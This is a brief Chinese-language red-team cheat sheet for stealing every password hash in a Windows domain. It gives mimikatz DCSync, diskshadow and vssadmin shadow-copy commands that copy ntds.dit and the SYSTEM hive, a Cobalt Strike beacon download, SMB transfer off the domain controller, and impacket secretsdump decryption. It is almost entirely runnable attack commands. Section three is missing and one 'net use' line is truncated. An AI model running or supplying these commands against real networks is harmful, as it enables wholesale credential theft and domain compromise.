一、dcsync导入域内所有hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
二、利用diskshadow 之前需要先切换到 system32 目录下
diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset DISKSHADOW> exit
reg save hklm\system c:\windows\temp\system.hive
beacon> download ntds.dit
beacon> download system.hive
将两个文件从域控托回被控机
net use \\192.168.75.129\c$ /user:"yiwang\Adminis
move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\
move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\
net use * /del /yes
mpacket中用 secretsdump.py脚本进行解密
python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt
四、vssadmin离线导入hash
vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive
参考:
https://xz.aliyun.com/t/2527#toc-1